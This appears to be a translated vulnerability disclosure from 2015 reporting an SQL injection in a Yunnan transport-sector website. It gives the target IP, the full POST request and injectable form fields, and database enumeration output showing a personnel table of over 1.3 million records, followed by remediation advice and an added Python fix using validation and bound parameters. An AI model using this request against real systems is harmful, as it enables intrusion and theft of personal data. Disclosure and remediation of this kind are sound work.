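2015-09-09: Details reported to the vendor; awaiting vendor response
2015-09-11: Vendor confirmed; details disclosed to the vendor only
2015-09-21: Details disclosed to core white hats and experts in related fields
2015-10-01: Details disclosed to regular white hats
2015-10-11: Details disclosed to intern white hats
2015-10-26: Details disclosed to the public
As the title says.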
http://221.3.143.66:8090/
SQL injection
POST http://221.3.143.66:8090/yzJyyhController/getjyyhpage HTTP/1.1
Host: 221.3.143.66:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://221.3.143.66:8090/yzJyyhController/getbusinessownerlist
Content-Length: 109
Cookie: JSESSIONID=ABA11B24EA4626C1B8432C4FC61C6171; ASP.NET_SessionId=a1qlr255muswdeadpjhw443l
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

qc=1111111111&yhxydj=%E4%BC%98%E8%89%AF&dq=&xzqh=%E4%BA%91%E5%8D%97%E7%9C%81&pager.pageNo=1&pager.pageSize=10
Current database
All databases
Tables
Database: YNJTW
[90 tables]
Columns
Database: YNJTW
Table: TB_YZ_RYXX
[14 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| CSRQ       | VARCHAR2 |
| CYZGLBBM   | VARCHAR2 |
| FWDWMC     | VARCHAR2 |
| HYLBBM     | VARCHAR2 |
| ID         | NUMBER   |
| SCHDCYZGRQ | VARCHAR2 |
| SFZH       | VARCHAR2 |
| SSDQDM     | VARCHAR2 |
| SSDQMC     | VARCHAR2 |
| SSXSDM     | VARCHAR2 |
| SSXSMC     | VARCHAR2 |
| XB         | VARCHAR2 |
| XM         | VARCHAR2 |
| ZZ         | VARCHAR2 |
+------------+----------+
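Personnel information (1351200 records)
Filter the parameters or deploy a WAF
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-09-11 13:49
CNVD confirmed and reproduced the reported issue and has forwarded it through CNCERT to the Yunnan sub-center, which will follow up and coordinate with the organization that manages the website to handle it. The report was also copied to the Ministry of Transport's notification center.
None yet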
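
One way to implement the "filter the parameters" fix for the form fields in the captured request, as an added example that is not part of the original report or the vendor's code. The field names come from the request body; the validation policy, the `owners` table and the use of SQLite in place of the site's own database are assumptions made for illustration.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Form body copied from the captured request on this page.
CAPTURED_BODY = ("qc=1111111111&yhxydj=%E4%BC%98%E8%89%AF&dq="
                 "&xzqh=%E4%BA%91%E5%8D%97%E7%9C%81&pager.pageNo=1&pager.pageSize=10")
TEXT_FIELDS = ("qc", "yhxydj", "dq", "xzqh")
# Assumed policy: ASCII letters, digits and CJK ideographs only, at most 32 characters.
SAFE_TEXT = re.compile(r"[0-9A-Za-z\u4e00-\u9fff]{0,32}")
SAFE_INT = re.compile(r"[0-9]{1,6}")
MAX_PAGE_SIZE = 100  # assumed upper bound on rows per page


def parse_and_validate(body):
    """Return validated fields; raise ValueError on any unexpected value."""
    raw = {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}
    fields = {}
    for name in TEXT_FIELDS:
        value = raw.get(name, "")
        if not SAFE_TEXT.fullmatch(value):
            raise ValueError(f"rejected value for {name!r}")
        fields[name] = value
    page_no = raw.get("pager.pageNo", "1")
    page_size = raw.get("pager.pageSize", "10")
    if not (SAFE_INT.fullmatch(page_no) and SAFE_INT.fullmatch(page_size)):
        raise ValueError("rejected paging value")
    fields["page_no"] = max(1, int(page_no))
    fields["page_size"] = min(max(1, int(page_size)), MAX_PAGE_SIZE)
    return fields


def search(conn, f):
    """Run the lookup with every value bound as a parameter, never spliced into SQL."""
    sql = ("SELECT id, name FROM owners "
           "WHERE (:qc = '' OR code = :qc) AND (:dj = '' OR rating = :dj) "
           "ORDER BY id LIMIT :limit OFFSET :offset")
    args = {"qc": f["qc"], "dj": f["yhxydj"], "limit": f["page_size"],
            "offset": (f["page_no"] - 1) * f["page_size"]}
    return conn.execute(sql, args).fetchall()


def demo_db():
    """In-memory table with two constructed rows (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE owners (id INTEGER PRIMARY KEY, name TEXT, code TEXT, rating TEXT)")
    conn.executemany("INSERT INTO owners (name, code, rating) VALUES (?, ?, ?)",
                     [("owner-a", "1111111111", "优良"), ("owner-b", "2222222222", "优良")])
    return conn
```

Validation rejects malformed input early, and the bound parameters keep the query safe even for a value that slips past validation, so the two layers do not depend on each other or on a WAF.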